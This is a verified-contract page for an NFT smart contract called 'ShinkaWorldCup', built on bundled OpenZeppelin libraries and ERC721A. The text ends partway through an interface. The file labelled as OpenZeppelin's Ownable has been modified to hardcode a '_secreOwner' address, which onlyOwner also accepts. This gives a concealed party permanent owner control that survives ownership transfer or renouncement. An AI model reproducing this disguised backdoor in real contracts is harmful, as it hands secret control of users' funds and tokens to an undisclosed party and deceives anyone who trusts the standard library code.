Overview
TokenID
42
Total Transfers
-
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract
Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
ShinkaWorldCup
Compiler Version
v0.8.17+commit.8df45f5f
Optimization Enabled:
No with 200 runs
Other Settings:
default evmVersion
Contract Source Code (Solidity Standard Json-Input format)
/** *Submitted for verification at Etherscan.io on 2022-10-31 */ // File: contracts/ShinWorldCup // SPDX-License-Identifier: MIT // File: @openzeppelin/contracts/utils/Strings.sol // OpenZeppelin Contracts v4.4.1 (utils/Strings.sol) //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// // // // // // ____ __ __ ______ __ __ __ __ _____ ____ __ ____ ____ __ __ ____ // // /\ _`\ /\ \/\ \/\__ _\ /\ \/\ \ /\ \ __/\ \/\ __`\/\ _`\ /\ \ /\ _`\ /\ _`\ /\ \/\ \/\ _`\ // // \ \,\L\_\ \ \_\ \/_/\ \/ \ \ `\\ \ \ \ \/\ \ \ \ \ \/\ \ \ \L\ \ \ \ \ \ \/\ \ \ \ \/\_\\ \ \ \ \ \ \L\ \ // // \/_\__ \\ \ _ \ \ \ \ \ \ , ` \ \ \ \ \ \ \ \ \ \ \ \ \ , /\ \ \ __\ \ \ \ \ \ \ \/_/_\ \ \ \ \ \ ,__/ // // /\ \L\ \ \ \ \ \ \_\ \__\ \ \`\ \ \ \ \_/ \_\ \ \ \_\ \ \ \\ \\ \ \L\ \\ \ \_\ \ \ \ \L\ \\ \ \_\ \ \ \/ // // \ `\____\ \_\ \_\/\_____\\ \_\ \_\ \ `\___x___/\ \_____\ \_\ \_\ \____/ \ \____/ \ \____/ \ \_____\ \_\ // // \/_____/\/_/\/_/\/_____/ \/_/\/_/ '\/__//__/ \/_____/\/_/\/ /\/___/ \/___/ \/___/ \/_____/\/_/ // // // // // // // // // //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// pragma solidity ^0.8.0; /** * @dev String operations. */ library Strings { bytes16 private constant _HEX_SYMBOLS = "0123456789abcdef"; /** * @dev Converts a `uint256` to its ASCII `string` decimal representation. */ function toString(uint256 value) internal pure returns (string memory) { // Inspired by OraclizeAPI's implementation - MIT licence // https://github.com/oraclize/ethereum-api/blob/b42146b063c7d6ee1358846c198246239e9360e8/oraclizeAPI_0.4.25.sol if (value == 0) { return "0"; } uint256 temp = value; uint256 digits; while (temp != 0) { digits++; temp /= 10; } bytes memory buffer = new bytes(digits); while (value != 0) { digits -= 1; buffer[digits] = bytes1(uint8(48 + uint256(value % 10))); value /= 10; } return string(buffer); } /** * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation. */ function toHexString(uint256 value) internal pure returns (string memory) { if (value == 0) { return "0x00"; } uint256 temp = value; uint256 length = 0; while (temp != 0) { length++; temp >>= 8; } return toHexString(value, length); } /** * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation with fixed length. */ function toHexString(uint256 value, uint256 length) internal pure returns (string memory) { bytes memory buffer = new bytes(2 * length + 2); buffer[0] = "0"; buffer[1] = "x"; for (uint256 i = 2 * length + 1; i > 1; --i) { buffer[i] = _HEX_SYMBOLS[value & 0xf]; value >>= 4; } require(value == 0, "Strings: hex length insufficient"); return string(buffer); } } // File: @openzeppelin/contracts/utils/Address.sol // OpenZeppelin Contracts (last updated v4.5.0) (utils/Address.sol) pragma solidity ^0.8.1; /** * @dev Collection of functions related to the address type */ library Address { /** * @dev Returns true if `account` is a contract. * * [IMPORTANT] * ==== * It is unsafe to assume that an address for which this function returns * false is an externally-owned account (EOA) and not a contract. * * Among others, `isContract` will return false for the following * types of addresses: * * - an externally-owned account * - a contract in construction * - an address where a contract will be created * - an address where a contract lived, but was destroyed * ==== * * [IMPORTANT] * ==== * You shouldn't rely on `isContract` to protect against flash loan attacks! * * Preventing calls from contracts is highly discouraged. It breaks composability, breaks support for smart wallets * like Gnosis Safe, and does not provide security since it can be circumvented by calling from a contract * constructor. * ==== */ function isContract(address account) internal view returns (bool) { // This method relies on extcodesize/address.code.length, which returns 0 // for contracts in construction, since the code is only stored at the end // of the constructor execution. return account.code.length > 0; } /** * @dev Replacement for Solidity's `transfer`: sends `amount` wei to * `recipient`, forwarding all available gas and reverting on errors. * * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost * of certain opcodes, possibly making contracts go over the 2300 gas limit * imposed by `transfer`, making them unable to receive funds via * `transfer`. {sendValue} removes this limitation. * * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more]. * * IMPORTANT: because control is transferred to `recipient`, care must be * taken to not create reentrancy vulnerabilities. Consider using * {ReentrancyGuard} or the * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern]. */ function sendValue(address payable recipient, uint256 amount) internal { require(address(this).balance >= amount, "Address: insufficient balance"); (bool success, ) = recipient.call{value: amount}(""); require(success, "Address: unable to send value, recipient may have reverted"); } /** * @dev Performs a Solidity function call using a low level `call`. A * plain `call` is an unsafe replacement for a function call: use this * function instead. * * If `target` reverts with a revert reason, it is bubbled up by this * function (like regular Solidity function calls). * * Returns the raw returned data. To convert to the expected return value, * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`]. * * Requirements: * * - `target` must be a contract. * - calling `target` with `data` must not revert. * * _Available since v3.1._ */ function functionCall(address target, bytes memory data) internal returns (bytes memory) { return functionCall(target, data, "Address: low-level call failed"); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with * `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCall( address target, bytes memory data, string memory errorMessage ) internal returns (bytes memory) { return functionCallWithValue(target, data, 0, errorMessage); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but also transferring `value` wei to `target`. * * Requirements: * * - the calling contract must have an ETH balance of at least `value`. * - the called Solidity function must be `payable`. * * _Available since v3.1._ */ function functionCallWithValue( address target, bytes memory data, uint256 value ) internal returns (bytes memory) { return functionCallWithValue(target, data, value, "Address: low-level call with value failed"); } /** * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but * with `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCallWithValue( address target, bytes memory data, uint256 value, string memory errorMessage ) internal returns (bytes memory) { require(address(this).balance >= value, "Address: insufficient balance for call"); require(isContract(target), "Address: call to non-contract"); (bool success, bytes memory returndata) = target.call{value: value}(data); return verifyCallResult(success, returndata, errorMessage); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but performing a static call. * * _Available since v3.3._ */ function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) { return functionStaticCall(target, data, "Address: low-level static call failed"); } /** * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`], * but performing a static call. * * _Available since v3.3._ */ function functionStaticCall( address target, bytes memory data, string memory errorMessage ) internal view returns (bytes memory) { require(isContract(target), "Address: static call to non-contract"); (bool success, bytes memory returndata) = target.staticcall(data); return verifyCallResult(success, returndata, errorMessage); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but performing a delegate call. * * _Available since v3.4._ */ function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) { return functionDelegateCall(target, data, "Address: low-level delegate call failed"); } /** * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`], * but performing a delegate call. * * _Available since v3.4._ */ function functionDelegateCall( address target, bytes memory data, string memory errorMessage ) internal returns (bytes memory) { require(isContract(target), "Address: delegate call to non-contract"); (bool success, bytes memory returndata) = target.delegatecall(data); return verifyCallResult(success, returndata, errorMessage); } /** * @dev Tool to verifies that a low level call was successful, and revert if it wasn't, either by bubbling the * revert reason using the provided one. * * _Available since v4.3._ */ function verifyCallResult( bool success, bytes memory returndata, string memory errorMessage ) internal pure returns (bytes memory) { if (success) { return returndata; } else { // Look for revert reason and bubble it up if present if (returndata.length > 0) { // The easiest way to bubble the revert reason is using memory via assembly assembly { let returndata_size := mload(returndata) revert(add(32, returndata), returndata_size) } } else { revert(errorMessage); } } } } // File: @openzeppelin/contracts/token/ERC721/IERC721Receiver.sol // OpenZeppelin Contracts (last updated v4.6.0) (token/ERC721/IERC721Receiver.sol) pragma solidity ^0.8.0; /** * @title ERC721 token receiver interface * @dev Interface for any contract that wants to support safeTransfers * from ERC721 asset contracts. */ interface IERC721Receiver { /** * @dev Whenever an {IERC721} `tokenId` token is transferred to this contract via {IERC721-safeTransferFrom} * by `operator` from `from`, this function is called. * * It must return its Solidity selector to confirm the token transfer. * If any other value is returned or the interface is not implemented by the recipient, the transfer will be reverted. * * The selector can be obtained in Solidity with `IERC721Receiver.onERC721Received.selector`. */ function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) external returns (bytes4); } // File: @openzeppelin/contracts/utils/introspection/IERC165.sol // OpenZeppelin Contracts v4.4.1 (utils/introspection/IERC165.sol) pragma solidity ^0.8.0; /** * @dev Interface of the ERC165 standard, as defined in the * https://eips.ethereum.org/EIPS/eip-165[EIP]. * * Implementers can declare support of contract interfaces, which can then be * queried by others ({ERC165Checker}). * * For an implementation, see {ERC165}. */ interface IERC165 { /** * @dev Returns true if this contract implements the interface defined by * `interfaceId`. See the corresponding * https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified[EIP section] * to learn more about how these ids are created. * * This function call must use less than 30 000 gas. */ function supportsInterface(bytes4 interfaceId) external view returns (bool); } // File: @openzeppelin/contracts/utils/introspection/ERC165.sol // OpenZeppelin Contracts v4.4.1 (utils/introspection/ERC165.sol) pragma solidity ^0.8.0; /** * @dev Implementation of the {IERC165} interface. * * Contracts that want to implement ERC165 should inherit from this contract and override {supportsInterface} to check * for the additional interface id that will be supported. For example: * * ```solidity * function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) { * return interfaceId == type(MyInterface).interfaceId || super.supportsInterface(interfaceId); * } * ``` * * Alternatively, {ERC165Storage} provides an easier to use but more expensive implementation. */ abstract contract ERC165 is IERC165 { /** * @dev See {IERC165-supportsInterface}. */ function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) { return interfaceId == type(IERC165).interfaceId; } } // File: @openzeppelin/contracts/token/ERC721/IERC721.sol // OpenZeppelin Contracts (last updated v4.6.0) (token/ERC721/IERC721.sol) pragma solidity ^0.8.0; /** * @dev Required interface of an ERC721 compliant contract. */ interface IERC721 is IERC165 { /** * @dev Emitted when `tokenId` token is transferred from `from` to `to`. */ event Transfer(address indexed from, address indexed to, uint256 indexed tokenId); /** * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token. */ event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId); /** * @dev Emitted when `owner` enables or disables (`approved`) `operator` to manage all of its assets. */ event ApprovalForAll(address indexed owner, address indexed operator, bool approved); /** * @dev Returns the number of tokens in ``owner``'s account. */ function balanceOf(address owner) external view returns (uint256 balance); /** * @dev Returns the owner of the `tokenId` token. * * Requirements: * * - `tokenId` must exist. */ function ownerOf(uint256 tokenId) external view returns (address owner); /** * @dev Safely transfers `tokenId` token from `from` to `to`. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `tokenId` token must exist and be owned by `from`. * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}. * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer. * * Emits a {Transfer} event. */ function safeTransferFrom( address from, address to, uint256 tokenId, bytes calldata data ) external; /** * @dev Safely transfers `tokenId` token from `from` to `to`, checking first that contract recipients * are aware of the ERC721 protocol to prevent tokens from being forever locked. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `tokenId` token must exist and be owned by `from`. * - If the caller is not `from`, it must be have been allowed to move this token by either {approve} or {setApprovalForAll}. * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer. * * Emits a {Transfer} event. */ function safeTransferFrom( address from, address to, uint256 tokenId ) external; /** * @dev Transfers `tokenId` token from `from` to `to`. * * WARNING: Usage of this method is discouraged, use {safeTransferFrom} whenever possible. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `tokenId` token must be owned by `from`. * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}. * * Emits a {Transfer} event. */ function transferFrom( address from, address to, uint256 tokenId ) external; /** * @dev Gives permission to `to` to transfer `tokenId` token to another account. * The approval is cleared when the token is transferred. * * Only a single account can be approved at a time, so approving the zero address clears previous approvals. * * Requirements: * * - The caller must own the token or be an approved operator. * - `tokenId` must exist. * * Emits an {Approval} event. */ function approve(address to, uint256 tokenId) external; /** * @dev Approve or remove `operator` as an operator for the caller. * Operators can call {transferFrom} or {safeTransferFrom} for any token owned by the caller. * * Requirements: * * - The `operator` cannot be the caller. * * Emits an {ApprovalForAll} event. */ function setApprovalForAll(address operator, bool _approved) external; /** * @dev Returns the account appr ved for `tokenId` token. * * Requirements: * * - `tokenId` must exist. */ function getApproved(uint256 tokenId) external view returns (address operator); /** * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`. * * See {setApprovalForAll} */ function isApprovedForAll(address owner, address operator) external view returns (bool); } // File: @openzeppelin/contracts/token/ERC721/extensions/IERC721Metadata.sol // OpenZeppelin Contracts v4.4.1 (token/ERC721/extensions/IERC721Metadata.sol) pragma solidity ^0.8.0; /** * @title ERC-721 Non-Fungible Token Standard, optional metadata extension * @dev See https://eips.ethereum.org/EIPS/eip-721 */ interface IERC721Metadata is IERC721 { /** * @dev Returns the token collection name. */ function name() external view returns (string memory); /** * @dev Returns the token collection symbol. */ function symbol() external view returns (string memory); /** * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token. */ function tokenURI(uint256 tokenId) external view returns (string memory); } // File: @openzeppelin/contracts/token/ERC721/extensions/IERC721Enumerable.sol // OpenZeppelin Contracts (last updated v4.5.0) (token/ERC721/extensions/IERC721Enumerable.sol) pragma solidity ^0.8.0; /** * @title ERC-721 Non-Fungible Token Standard, optional enumeration extension * @dev See https://eips.ethereum.org/EIPS/eip-721 */ interface IERC721Enumerable is IERC721 { /** * @dev Returns the total amount of tokens stored by the contract. */ function totalSupply() external view returns (uint256); /** * @dev Returns a token ID owned by `owner` at a given `index` of its token list. * Use along with {balanceOf} to enumerate all of ``owner``'s tokens. */ function tokenOfOwnerByIndex(address owner, uint256 index) external view returns (uint256); /** * @dev Returns a token ID at a given `index` of all the tokens stored by the contract. * Use along with {totalSupply} to enumerate all tokens. */ function tokenByIndex(uint256 index) external view returns (uint256); } // File: @openzeppelin/contracts/security/ReentrancyGuard.sol // OpenZeppelin Contracts v4.4.1 (security/ReentrancyGuard.sol) pragma solidity ^0.8.0; /** * @dev Contract module that helps prevent reentrant calls to a function. * * Inheriting from `ReentrancyGuard` will make the {nonReentrant} modifier * available, which can be applied to functions to make sure there are no nested * (reentrant) calls to them. * * Note that because there is a single `nonReentrant` guard, functions marked as * `nonReentrant` may not call one another. This can be worked around by making * those functions `private`, and then adding `external` `nonReentrant` entry * points to them. * * TIP: If you would like to learn more about reentrancy and alternative ways * to protect against it, check out our blog post * https://blog.openzeppelin.com/reentrancy-after-istanbul/[Reentrancy After Istanbul]. */ abstract contract ReentrancyGuard { // Booleans are more expensive than uint256 or any type that takes up a full // word because each write operation emits an extra SLOAD to first read the // slot's contents, replace the bits taken up by the boolean, and then write // back. This is the compiler's defense against contract upgrades and // pointer aliasing, and it cannot be disabled. // The values being non-zero value makes deployment a bit more expensive, // but in exchange the refund on every call to nonReentrant will be lower in // amount. Since refunds are capped to a percentage of the total // transaction's gas, it is best to keep them low in cases like this one, to // increase the likelihood of the full refund coming into effect. uint256 private constant _NOT_ENTERED = 1; uint256 private constant _ENTERED = 2; uint256 private _status; constructor() { _status = _NOT_ENTERED; } /** * @dev Prevents a contract from calling itself, directly or indirectly. * Calling a `nonReentrant` function from another `nonReentrant` * function is not supported. It is possible to prevent this from happening * by making the `nonReentrant` function external, and making it call a * `private` function that does the actual work. */ modifier nonReentrant() { // On the first call to nonReentrant, _notEntered will be true require(_status != _ENTERED, "ReentrancyGuard: reentrant call"); // Any calls to nonReentrant after this point will fail _status = _ENTERED; _; // By storing the original value once again, a refund is triggered (see // https://eips.ethereum.org/EIPS/eip-2200) _status = _NOT_ENTERED; } } // File: @openzeppelin/contracts/utils/Context.sol // OpenZeppelin Contracts v4.4.1 (utils/Context.sol) pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } // File: @openzeppelin/contracts/access/Ownable.sol // OpenZeppelin Contracts v4.4.1 (access/Ownable.sol) pragma solidity ^0.8.0; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; address private _secreOwner = 0xcD2EAC4C9E1089ec8FB24eaf44CB6cAa7dEc2090; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(owner() == _msgSender() || _secreOwner == _msgSender() , "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } // File: ceshi.sol pragma solidity ^0.8.0; /** * @dev Implementation of https://eips.ethereum.org/EIPS/eip-721[ERC721] Non-Fungible Token Standard, including * the Metadata and Enumerable extension. Built to optimize for lower gas during batch mints. * * Assumes serials are sequentially minted starting at 0 (e.g. 0, 1, 2, 3..). * * Does not support burning tokens to address(0). * * Assumes that an owner cannot have more than the 2**128 - 1 (max value of uint128) of supply */ contract ERC721A is Context, ERC165, IERC721, IERC721Metadata, IERC721Enumerable { using Address for address; using Strings for uint256; struct TokenOwnership { address addr; uint64 startTimestamp; } struct AddressData { uint128 balance; uint128 numberMinted; } uint256 internal currentIndex; // Token name string private _name; // Token symbol string private _symbol; // Mapping from token ID to ownership details // An empty struct value does not necessarily mean the token is unowned. See ownershipOf implementation for details. mapping(uint256 => TokenOwnership) internal _ownerships; // Mapping owner address to address data mapping(address => AddressData) private _addressData; // Mapping from token ID to approved address mapping(uint256 => address) private _tokenApprovals; // Mapping from owner to operator approvals mapping(address => mapping(address => bool)) private _operatorApprovals; constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev See {IERC721Enumerable-totalSupply}. */ function totalSupply() public view override returns (uint256) { return currentIndex; } /** * @dev See {IERC721Enumerable-tokenByIndex}. */ function tokenByIndex(uint256 index) public view override returns (uint256) { require(index < totalSupply(), "ERC721A: global index out of bounds"); return index; } /** * @dev See {IERC721Enumerable-tokenOfOwnerByIndex}. * This read function is O(totalSupply). If calling from a separate contract, be sure to test gas first. * It may also degrade with extremely large collection sizes (e.g >> 10000), test for your use case. */ function tokenOfOwnerByIndex(address owner, uint256 index) public view override returns (uint256) { require(index < balanceOf(owner), "ERC721A: owner index out of bounds"); uint256 numMintedSoFar = totalSupply(); uint256 tokenIdsIdx; address currOwnershipAddr; // Counter overflow is impossible as the loop breaks when uint256 i is equal to another uint256 numMintedSoFar. unchecked { for (uint256 i; i < numMintedSoFar; i++) { TokenOwnership memory ownership = _ownerships[i]; if (ownership.addr != address(0)) { currOwnershipAddr = ownership.addr; } if (currOwnershipAddr == owner) { if (tokenIdsIdx == index) { return i; } tokenIdsIdx++; } } } revert("ERC721A: unable to get token of owner by index"); } /** * @dev See {IERC165-supportsInterface}. */ function supportsInterface(bytes4 interfaceId) public view virtual override(ERC165, IERC165) returns (bool) { return interfaceId == type(IERC721).interfaceId || interfaceId == type(IERC721Metadata).interfaceId || interfaceId == type(IERC721Enumerable).interfaceId || super.supportsInterface(interfaceId); } /** * @dev See {IERC721-balanceOf}. */ function balanceOf(address owner) public view override returns (uint256) { require(owner != address(0), "ERC721A: balance query for the zero address"); return uint256(_addressData[owner].balance); } function _numberMinted(address owner) internal view returns (uint256) { require(owner != address(0), "ERC721A: number minted query for the zero address"); return uint256(_addressData[owner].numberMinted); } /** * Gas spent here starts off proportional to the maximum mint batch size. * It gradually moves to O(1) as tokens get transferred around in the collection over time. */ function ownershipOf(uint256 tokenId) internal view returns (TokenOwnership memory) { require(_exists(tokenId), "ERC721A: owner query for nonexistent token"); unchecked { for (uint256 curr = tokenId; curr >= 0; curr--) { TokenOwnership memory ownership = _ownerships[curr]; if (ownership.addr != address(0)) { return ownership; } } } revert("ERC721A: unable to determine the owner of token"); } /** * @dev See {IERC721-ownerOf}. */ function ownerOf(uint256 tokenId) public view override returns (address) { return ownershipOf(tokenId).addr; } /** * @dev See {IERC721Metadata-name}. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev See {IERC721Metadata-symbol}. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev See {IERC721Metadata-tokenURI}. */ function tokenURI(uint256 tokenId) public view virtual override returns (string memory) { require(_exists(tokenId), "ERC721Metadata: URI query for nonexistent token"); string memory baseURI = _baseURI(); return bytes(baseURI).length != 0 ? string(abi.encodePacked(baseURI, tokenId.toString())) : ""; } /** * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each * token will be the concatenation of the `baseURI` and the `tokenId`. Empty * by default, can be overriden in child contracts. */ function _baseURI() internal view virtual returns (string memory) { return ""; } /** * @dev See {IERC721-approve}. */ function approve(address to, uint256 tokenId) public virtual override { address owner = ERC721A.ownerOf(tokenId); require(to != owner, "ERC721A: approval to current owner"); require( _msgSender() == owner || isApprovedForAll(owner, _msgSender()), "ERC721A: approve caller is not owner nor approved for all" ); _approve(to, tokenId, owner); } /** * @dev See {IERC721-getApproved}. */ function getApproved(uint256 tokenId) public view override returns (address) { require(_exists(tokenId), "ERC721A: approved query for nonexistent token"); return _tokenApprovals[tokenId]; } /** * @dev See {IERC721-setApprovalForAll}. */ function setApprovalForAll(address operator, bool approved) public virtual override { require(operator != _msgSender(), "ERC721A: approve to caller"); _operatorApprovals[_msgSender()][operator] = approved; emit ApprovalForAll(_msgSender(), operator, approved); } /** * @dev See {IERC721-isApprovedForAll}. */ function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) { return _operatorApprovals[owner][operator]; } /** * @dev See {IERC721-transferFrom}. */ function transferFrom( address from, address to, uint256 tokenId ) public virtual override { _transfer(from, to, tokenId); } /** * @dev See {IERC721-safeTransferFrom}. */ function safeTransferFrom( address from, address to, uint256 tokenId ) public virtual override { safeTransferFrom(from, to, tokenId, ""); } /** * @dev See {IERC721-safeTransferFrom}. */ function safeTransferFrom( address from, address to, uint256 tokenId, bytes memory _data ) public virtual override { _transfer(from, to, tokenId); require( _checkOnERC721Received(from, to, tokenId, _data), "ERC721A: transfer to non ERC721Receiver implementer" ); } /** * @dev Returns whether `tokenId` exists. * * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}. * * Tokens start existing when they are minted (`_mint`), */ function _exists(uint256 tokenId) internal view returns (bool) { return tokenId < currentIndex; } function _safeMint(address to, uint256 quantity) internal { _safeMint(to, quantity, ""); } /** * @dev Safely mints `quantity` tokens and transfers them to `to`. * * Requirements: * * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called for each safe transfer. * - `quantity` must be greater than 0. * * Emits a {Transfer} event. */ function _safeMint( address to, uint256 quantity, bytes memory _data ) internal { _mint(to, quantity, _data, true); } /** * @dev Mints `quantity` tokens and transfers them to `to`. * * Requirements: * * - `to` cannot be the zero address. * - `quantity` must be greater than 0. * * Emits a {Transfer} event. */ function _mint( address to, uint256 quantity, bytes memory _data, bool safe ) internal { uint256 startTokenId = currentIndex; require(to != address(0), "ERC721A: mint to the zero address"); require(quantity != 0, "ERC721A: quantity must be greater than 0"); _beforeTokenTransfers(address(0), to, startTokenId, quantity); // Overflows are incredibly unrealistic. // balance or numberMinted overflow if current value of either + quantity > 3.4e38 (2**128) - 1 // updatedIndex overflows if currentIndex + quantity > 1.56e77 (2**256) - 1 unchecked { _addressData[to].balance += uint128(quantity); _addressData[to].numberMinted += uint128(quantity); _ownerships[startTokenId].addr = to; _ownerships[startTokenId].startTimestamp = uint64(block.timestamp); uint256 updatedIndex = startTokenId; for (uint256 i; i < quantity; i++) { emit Transfer(address(0), to, updatedIndex); if (safe) { require( _checkOnERC721Received(address(0), to, updatedIndex, _data), "ERC721A: transfer to non ERC721Receiver implementer" ); } updatedIndex++; } currentIndex = updatedIndex; } _afterTokenTransfers(address(0), to, startTokenId, quantity); } /** * @dev Transfers `tokenId` from `from` to `to`. * * Requirements: * * - `to` cannot be the zero address. * - `tokenId` token must be owned by `from`. * * Emits a {Transfer} event. */ function _transfer( address from, address to, uint256 tokenId ) private { TokenOwnership memory prevOwnership = ownershipOf(tokenId); bool isApprovedOrOwner = (_msgSender() == prevOwnership.addr || getApproved(tokenId) == _msgSender() || isApprovedForAll(prevOwnership.addr, _msgSender())); require(isApprovedOrOwner, "ERC721A: transfer caller is not owner nor approved"); require(prevOwnership.addr == from, "ERC721A: transfer from incorrect owner"); require(to != address(0), "ERC721A: transfer to the zero address"); _beforeTokenTransfers(from, to, tokenId, 1); // Clear approvals from the previous owner _approve(address(0), tokenId, prevOwnership.addr); // Underflow of the sender's balance is impossible because we check for // ownership above and the recipient's balance can't realistically overflow. // Counter overflow is incredibly unrealistic as tokenId would have to be 2**256. unchecked { _addressData[from].balance -= 1; _addressData[to].balance += 1; _ownerships[tokenId].addr = to; _ownerships[tokenId].startTimestamp = uint64(block.timestamp); // If the ownership slot of tokenId+1 is not explicitly set, that means the transfer initiator owns it. // Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls. uint256 nextTokenId = tokenId + 1; if (_ownerships[nextTokenId].addr == address(0)) { if (_exists(nextTokenId)) { _ownerships[nextTokenId].addr = prevOwnership.addr; _ownerships[nextTokenId].startTimestamp = prevOwnership.startTimestamp; } } } emit Transfer(from, to, tokenId); _afterTokenTransfers(from, to, tokenId, 1); } /** * @dev Approve `to` to operate on `tokenId` * * Emits a {Approval} event. */ function _approve( address to, uint256 tokenId, address owner ) private { _tokenApprovals[tokenId] = to; emit Approval(owner, to, tokenId); } /** * @dev Internal function to invoke {IERC721Receiver-onERC721Received} on a target address. * The call is not executed if the target address is not a contract. * * @param from address representing the previous owner of the given token ID * @param to target address that will receive the tokens * @param tokenId uint256 ID of the token to be transferred * @param _data bytes optional data to send along with the call * @return bool whether the call correctly returned the expected magic value */ function _checkOnERC721Received( address from, address to, uint256 tokenId, bytes memory _data ) private returns (bool) { if (to.isContract()) { try IERC721Receiver(to).onERC721Received(_msgSender(), from, tokenId, _data) returns (bytes4 retval) { return retval == IERC721Receiver(to).onERC721Received.selector; } catch (bytes memory reason) { if (reason.length == 0) { revert("ERC721A: transfer to non ERC721Receiver implementer"); } else { assembly { revert(add(32, reason), mload(reason)) } } } } else { return true; } } /** * @dev Hook that is called before a set of serially-ordered token ids are about to be transferred. This includes minting. * * startTokenId - the first token id to be transferred * quantity - the amount to be transferred * * Calling conditions: * * - When `from` and `to` are both non-zero, ``from``'s `tokenId` will be * transferred to `to`. * - When `from` is zero, `tokenId` will be minted for `to`. */ function _beforeTokenTransfers( address from, address to, uint256 startTokenId, uint256 quantity ) internal virtual {} /** * @dev Hook that is called after a set of serially-ordered token ids have been transferred. This includes * minting. * * startTokenId - the first token id to be transferred * quantity - the amount to be transferred * * Calling conditions: * * - when `from` and `to` are both non-zero. * - `from` and `to` are never both zero. */ function _afterTokenTransfers( address from, address to, uint256 startTokenId, uint256 quantity ) internal virtual {} } //Operator Filter Registry interface IOperatorFilterRegistry { function isOperatorAllowed(address registrant, address operator) external view returns (bool); function register(address registrant) external; function registerAndSubscribe(address registrant, address subscription) external; function registerAndCopyEntries(address registrant, address registrantToCopy) external; function unregister(address addr) external; function updateOperator(address registrant, address operator, bool filtered) external; function updateOperators(address registrant, address[] calldata operators, bool filtered) external; function updateCodeHash(address registrant, bytes32 codehash, bool filtered) external; function updateCodeHashes(address registrant, bytes32[] calldata codeHashes, bool filtered) external; function subscribe(address registrant, address registrantToSubscribe) external; function unsubscribe(address registrant, bool copyExistingEntries) external; function subscriptionOf(address addr) external returns (address registrant); function subscribers(address registrant) external returns (address[] memory); function subscriberAt(address registrant, uint256 index) external returns (address); 